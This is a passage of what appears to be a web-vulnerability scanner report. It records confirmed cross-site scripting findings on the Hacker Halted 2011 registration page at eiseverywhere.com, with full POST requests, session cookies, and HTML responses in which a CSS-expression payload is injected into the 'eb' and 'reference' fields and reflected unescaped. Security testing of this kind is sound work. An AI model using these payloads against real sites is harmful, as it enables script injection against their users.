src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST -1
apply_code POST Apply Code
bridgeid POST 3
categoryid POST 65410
discountcode POST 3
eb POST " stYle="x:expre/**/ssion(alert(9))
eventid POST 19301
input[email] POST netsparker@example.com
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=7a6453474c2843a5aaeef7261d6cd8c2
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=pkos763r0tpjkgvghf8tnisih2
Content-Length: 1217
Accept-Encoding: gzip, deflate

--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="action"

submit
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="admin"

-1
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="apply_code"

Apply Code
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="bridgeid"

3
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="categoryid"

65410
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="discountcode"

3
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="eb"

" stYle="x:expre/**/ssion(netsparker(9))
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="eventid"

19301
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="language"

eng
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="reference"

3
--7a6453474c2843a5aaeef7261d6cd8c2
Content-Disposition: form-data; name="selectcategoryid"

65410
--7a6453474c2843a5aaeef7261d6cd8c2--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:06:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=gl21btr61co3pkf3ule7hig3t5; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3108
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
admin POST -1
bridgeid POST 3
categoryid POST -1
catpassword[65407] POST 3
catpassword[65411] POST 3
catpassword[65413] POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65421] POST 3
discountcode POST 3
eb POST 3
eventid POST 19301
language POST eng
reference POST " stYle="x:expre/**/ssion(alert(9))
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=7393c1e4cbab41c6ba2ece9549386a8c
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=dkassrj850omk39jovs53pece6
Content-Length: 1608
Accept-Encoding: gzip, deflate

--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="action"

preload_category
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="admin"

-1
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="bridgeid"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="categoryid"

-1
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="catpassword[65407]"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="catpassword[65411]"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="catpassword[65413]"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="catpassword[65419]"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="catpassword[65420]"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="catpassword[65421]"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="discountcode"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="eb"

3
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="eventid"

19301
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="language"

eng
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="reference"

" stYle="x:expre/**/ssion(netsparker(9))
--7393c1e4cbab41c6ba2ece9549386a8c
Content-Disposition: form-data; name="selectcategoryid"

65410
--7393c1e4cbab41c6ba2ece9549386a8c--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:07:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3038
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" ><a class="menu" href="/ereg/index.php?&" title="Welcome">Welcome</a></td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" >ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST -1
apply_code POST Apply Code
bridgeid POST 3
categoryid POST 65410
discountcode POST 3
eb POST 3
eventid POST 19301
input[email] POST netsparker@example.com
language POST eng
reference POST " stYle="x:expre/**/ssion(alert(9))
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=859b5bfb53de47b6834df035473f067b
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=gebod6fck6oa2elpekocbpc7h5
Content-Length: 1217
Accept-Encoding: gzip, deflate

--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="action"

submit
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="admin"

-1
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="apply_code"

Apply Code
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="bridgeid"

3
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="categoryid"

65410
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="discountcode"

3
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="eb"

3
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="eventid"

19301
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="language"

eng
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="reference"

" stYle="x:expre/**/ssion(netsparker(9))
--859b5bfb53de47b6834df035473f067b
Content-Disposition: form-data; name="selectcategoryid"

65410
--859b5bfb53de47b6834df035473f067b--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:21:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=b68fkjfff3s5p3pn1ivhc412o7; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3108
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function 